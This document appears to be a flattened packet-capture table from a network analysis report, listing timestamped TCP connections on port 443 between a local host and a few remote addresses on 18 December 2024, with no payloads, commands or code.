                                                                                        Dec 18, 2024 02:10:34.129312038 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.134299994 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.134357929 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:34.134371996 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.156153917 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.156189919 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.156219006 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:34.156239986 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.156294107 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:34.158782005 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.167201996 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.167270899 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:34.167285919 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.175208092 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.175301075 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:34.175335884 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.183645964 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.183732986 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:34.183748007 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.191818953 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.191879988 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:34.191895008 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.198046923 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.198118925 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:34.198132992 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.204184055 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.204250097 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:34.204262972 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.244067907 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:34.244082928 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.292073965 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:34.315820932 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.317068100 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.317157030 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:34.317188025 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.325047016 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.325108051 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:34.325120926 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.329567909 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.329632044 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:34.329654932 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.338248968 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.338314056 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:34.338326931 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.338387012 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:34.342670918 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.342680931 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.342741966 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:34.346645117 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.346700907 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:34.354475975 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.354506969 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.354564905 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:34.358692884 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.358701944 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.358778954 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:34.366681099 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.366750956 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:34.374721050 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.374799013 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:34.382560015 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.382621050 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:34.386784077 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.386853933 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:34.394601107 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.394668102 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:34.508097887 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.508184910 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:34.513830900 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.513967991 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:34.520061970 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.520143986 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:34.533653975 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.533731937 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:34.544312954 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.544414043 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:34.544434071 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.544460058 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.544508934 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:34.544533968 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.544559956 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:34.544559956 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:34.544627905 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:34.547008038 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:34.547024965 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.547106028 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:34.547329903 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:34.547342062 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.561139107 CET49725443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:34.607337952 CET44349725172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.692976952 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:34.693039894 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.693207026 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:34.693427086 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:34.693454981 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.902385950 CET44349725172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.902587891 CET44349725172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.902654886 CET49725443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:34.904694080 CET49725443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:34.904711962 CET44349725172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:35.042721033 CET49738443192.168.2.1635.190.80.1
                                                                                        Dec 18, 2024 02:10:35.042813063 CET4434973835.190.80.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:35.042906046 CET49738443192.168.2.1635.190.80.1
                                                                                        Dec 18, 2024 02:10:35.043118954 CET49738443192.168.2.1635.190.80.1
                                                                                        Dec 18, 2024 02:10:35.043142080 CET4434973835.190.80.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:35.340096951 CET44349735104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:35.340385914 CET49735443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:35.340425968 CET44349735104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:35.340893030 CET44349735104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:35.341275930 CET49735443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:35.341363907 CET44349735104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:35.341414928 CET49735443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:35.383383036 CET44349735104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:35.394057035 CET49735443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:35.782809973 CET44349735104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:35.782907009 CET44349735104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:35.782974958 CET49735443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:35.783442974 CET49735443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:35.783473015 CET44349735104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:35.794759035 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:35.795011044 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:35.795022964 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:35.795514107 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:35.795810938 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:35.795912027 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:35.795919895 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:35.839334011 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:35.842087984 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:35.908962011 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:35.909265041 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:35.909284115 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:35.910372019 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:35.910686016 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:35.910826921 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:35.910839081 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:35.910864115 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:35.910892010 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:35.910967112 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:35.954231024 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.238785982 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.238872051 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.238913059 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.238924026 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.238934994 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.238974094 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.238980055 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.246129990 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.246193886 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.246201992 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.254385948 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.254443884 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.254451036 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.265729904 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.265774012 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.265786886 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.272316933 CET4434973835.190.80.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.274312019 CET49738443192.168.2.1635.190.80.1
                                                                                        Dec 18, 2024 02:10:36.274342060 CET4434973835.190.80.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.276051998 CET4434973835.190.80.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.276123047 CET49738443192.168.2.1635.190.80.1
                                                                                        Dec 18, 2024 02:10:36.280170918 CET49738443192.168.2.1635.190.80.1
                                                                                        Dec 18, 2024 02:10:36.280268908 CET4434973835.190.80.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.280344009 CET49738443192.168.2.1635.190.80.1
                                                                                        Dec 18, 2024 02:10:36.280358076 CET4434973835.190.80.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.320064068 CET49738443192.168.2.1635.190.80.1
                                                                                        Dec 18, 2024 02:10:36.320322037 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.359699965 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.393297911 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.393513918 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.393573046 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.393593073 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.394153118 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.394206047 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.394221067 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.400099039 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.400106907 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.406347990 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.406424046 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.406438112 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.412144899 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.412209988 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.412230015 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.417931080 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.417996883 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.418010950 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.433398008 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.433453083 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.433464050 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.442889929 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.442941904 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.442950010 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.451036930 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.451088905 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.451096058 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.464087963 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.464729071 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.464770079 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.464793921 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.464802980 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.464854002 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.468988895 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.475610971 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.475686073 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.475693941 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.481821060 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.481894970 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.481903076 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.489850998 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.489912033 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.489919901 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.497965097 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.498043060 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.498054028 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.512836933 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.513770103 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.513829947 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.513839960 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.521876097 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.521934986 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.521945953 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.529974937 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.530047894 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.530056000 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.560071945 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.560090065 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.576072931 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.596627951 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.596817017 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.596832037 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.607913971 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.607996941 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.608089924 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.608109951 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.608172894 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.610047102 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.616986036 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.617060900 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.617074966 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.619760990 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.622149944 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.622198105 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.622210979 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.625024080 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.625094891 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.625118017 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.628117085 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.628169060 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.628177881 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.633177996 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.633240938 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.633258104 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.636974096 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.637038946 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.637048006 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.637095928 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.641484976 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.641546965 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.641561985 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.641716957 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.641726017 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.641762972 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.648421049 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.648475885 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.655725002 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.655791044 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.655806065 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.657677889 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.657687902 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.657737017 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.661941051 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.661950111 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.662002087 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.663212061 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.663280964 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.663297892 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.668065071 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.668123007 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.669723034 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.669784069 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.669799089 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.674483061 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.674552917 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.676847935 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.676912069 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.676928043 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.678515911 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.678576946 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.684016943 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.684083939 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.684098005 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.686614990 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.686670065 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.694583893 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.694673061 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.698878050 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.698932886 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.706640005 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.706727982 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.714710951 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.714772940 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.732906103 CET4434973835.190.80.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.733006001 CET4434973835.190.80.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.733068943 CET49738443192.168.2.1635.190.80.1
                                                                                        Dec 18, 2024 02:10:36.733187914 CET49738443192.168.2.1635.190.80.1
                                                                                        Dec 18, 2024 02:10:36.733244896 CET4434973835.190.80.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.733272076 CET49738443192.168.2.1635.190.80.1
                                                                                        Dec 18, 2024 02:10:36.733304977 CET49738443192.168.2.1635.190.80.1
                                                                                        Dec 18, 2024 02:10:36.733800888 CET49739443192.168.2.1635.190.80.1
                                                                                        Dec 18, 2024 02:10:36.733839989 CET4434973935.190.80.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.733902931 CET49739443192.168.2.1635.190.80.1
                                                                                        Dec 18, 2024 02:10:36.734173059 CET49739443192.168.2.1635.190.80.1
                                                                                        Dec 18, 2024 02:10:36.734184980 CET4434973935.190.80.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.736068964 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.740524054 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.740581036 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.781563044 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.787091017 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.787162066 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.787178040 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.795782089 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.795844078 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.795872927 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.798629999 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.798708916 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.798722029 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.798794985 CET49737443192.168.2.16104.18.95.41
